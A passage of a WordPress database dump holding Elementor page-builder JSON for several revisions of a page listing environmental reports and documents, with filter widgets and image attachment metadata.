options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38616,5786,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1600;s:6:\"height\";i:1200;s:4:\"file\";s:25:\"2026/02/today-news-1.jpeg\";s:8:\"filesize\";i:382992;s:5:\"sizes\";a:16:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"today-news-1-300x225.jpeg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21629;}s:5:\"large\";a:5:{s:4:\"file\";s:26:\"today-news-1-1024x768.jpeg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:183722;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"today-news-1-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8104;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"today-news-1-768x576.jpeg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:111509;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:27:\"today-news-1-1536x1152.jpeg\";s:5:\"width\";i:1536;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:355334;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:25:\"today-news-1-370x265.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:265;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:30284;}s:12:\"kava-thumb-s\";a:5:{s:4:\"file\";s:24:\"today-news-1-150x85.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:85;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5759;}s:14:\"kava-thumb-s-2\";a:5:{s:4:\"file\";s:25:\"today-news-1-230x230.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:230;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16659;}s:12:\"kava-thumb-m\";a:5:{s:4:\"file\";s:25:\"today-news-1-400x400.jpeg\";s:5:\"width\";i:400;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:44627;}s:21:\"kava-thumb-m-vertical\";a:5:{s:4:\"file\";s:25:\"today-news-1-370x500.jpeg\";s:5:\"width\";i:370;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:48121;}s:14:\"kava-thumb-m-2\";a:5:{s:4:\"file\";s:25:\"today-news-1-570x450.jpeg\";s:5:\"width\";i:570;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:70185;}s:12:\"kava-thumb-l\";a:5:{s:4:\"file\";s:26:\"today-news-1-1170x650.jpeg\";s:5:\"width\";i:1170;s:6:\"height\";i:650;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:183668;}s:13:\"kava-thumb-xl\";a:5:{s:4:\"file\";s:27:\"today-news-1-1600x1080.jpeg\";s:5:\"width\";i:1600;s:6:\"height\";i:1080;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:395748;}s:18:\"kava-thumb-masonry\";a:5:{s:4:\"file\";s:25:\"today-news-1-600x450.jpeg\";s:5:\"width\";i:600;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:72983;}s:18:\"kava-thumb-justify\";a:5:{s:4:\"file\";s:25:\"today-news-1-640x640.jpeg\";s:5:\"width\";i:640;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99719;}s:20:\"kava-thumb-justify-2\";a:5:{s:4:\"file\";s:26:\"today-news-1-1280x640.jpeg\";s:5:\"width\";i:1280;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:189253;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(26390,3863,'_elementor_pro_version','3.3.6'),(26403,3865,'_elementor_edit_mode','builder'),(26404,3865,'_elementor_template_type','wp-page'),(26405,3865,'_elementor_version','3.4.0'),(26406,3865,'_wp_page_template','default'),(26407,3865,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[{\"id\":\"51185e0\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"3846\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"apply_button_text\":\"\",\"apply_button_icon\":\"fa fa-search\",\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"},{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\",\"filter_id\":[\"3847\"]},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26409,3865,'_elementor_pro_version','3.3.6'),(26411,3866,'_elementor_edit_mode','builder'),(26412,3866,'_elementor_template_type','wp-page'),(26413,3866,'_elementor_version','3.4.0'),(26414,3866,'_wp_page_template','default'),(26415,3866,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[{\"id\":\"51185e0\",\"elType\":\"widget\",\"settings\":{\"filter_id\":\"3846\",\"content_provider\":\"epro-posts\",\"apply_type\":\"ajax-ontyping\",\"apply_button_text\":\"\",\"apply_button_icon\":\"fa fa-search\",\"show_label\":\"yes\",\"additional_providers_enabled\":\"\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-search\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"},{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\",\"filter_id\":[\"3847\"]},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f128edd\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button\":\"yes\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"search_placeholder\":\"Search...\",\"more_text\":\"More\",\"less_text\":\"Less\",\"dropdown_placeholder\":\"Select some options\",\"apply_indexer\":\"yes\",\"show_counter\":\"yes\"},\"elements\":[],\"widgetType\":\"jet-smart-filters-checkboxes\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38615,5786,'_wp_attached_file','2026/02/today-news-1.jpeg'),(26417,3866,'_elementor_pro_version','3.3.6'),(26419,3867,'_elementor_edit_mode','builder'),(26420,3867,'_elementor_template_type','wp-page'),(26421,3867,'_elementor_version','3.4.0'),(26422,3867,'_wp_page_template','default'),(26423,3867,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\",\"filter_id\":[\"3847\"]},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(26425,3867,'_elementor_pro_version','3.3.6'),(26428,3868,'_elementor_edit_mode','builder'),(26429,3868,'_elementor_template_type','wp-page'),(26430,3868,'_elementor_version','3.4.0'),(26431,3868,'_wp_page_template','default'),(26432,3868,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\",\"filter_id\":[\"3847\"]},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load More\",\"loadmore_loading_text\":\"Loading...\",\"custom_skin_template\":\"3834\",\"custom_posts_per_page\":20,\"pagination_type\":\"numbers_and_prev_next\"},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(38614,5785,'_last_editor_used_jetpack','block-editor'),(26434,3868,'_elementor_pro_version','3.3.6'),(26435,3869,'_elementor_edit_mode','builder'),(26436,3869,'_elementor_template_type','wp-page'),(26437,3869,'_elementor_version','3.4.0'),(26438,3869,'_wp_page_template','default'),(26439,3869,'_elementor_data','[{\"id\":\"c133358\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae2e5a3\"}]},\"elements\":[{\"id\":\"756cfc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"58e225d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Access environmental reports, publications, policies and other related documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4183ea6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ca1bc78\"}]},\"elements\":[{\"id\":\"0a14910\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2acca5d\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_tag:Uploaded By,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e75d31\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"9860148\"}]},\"elements\":[{\"id\":\"63cab16\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"030b293\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"2103cfc\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"72d992a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":26.703},\"elements\":[{\"id\":\"dd1bdde\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply filter\",\"show_label\":\"yes\",\"additional_providers_list\":[],\"apply_indexer\":\"yes\",\"filter_id\":[\"3847\"]},\"elements\":[],\"widgetType\":\"jet-smart-filters-select\"}],\"isInner\":true},{\"id\":\"daef577\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.555},\"elements\":[],\"isInner\":true},{\"id\":\"1627928\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8139127\",\"elType\":\"widget\",\"settings\":{\"content_provider\":\"epro-posts\",\"apply_button_text\":\"Apply\",\"additional_providers_list\":[]},\"elements\":[],\"widgetType\":\"jet-smart-filters-date-range\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"ca58786\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6cde138\"}]},\"elements\":[{\"id\":\"d2bf569\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c57d27d\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"custom\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"custom_template_list\":[{\"nth\":1,\"_id\":\"c6ad55e\"}],\"custom_meta_separator\":\"\\/\\/\\/\",\"posts_post_type\":\"document\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"&laquo; Previous\",\"pagination_next_label\":\"Next &raquo;\",\"loadmore_text\":\"Load 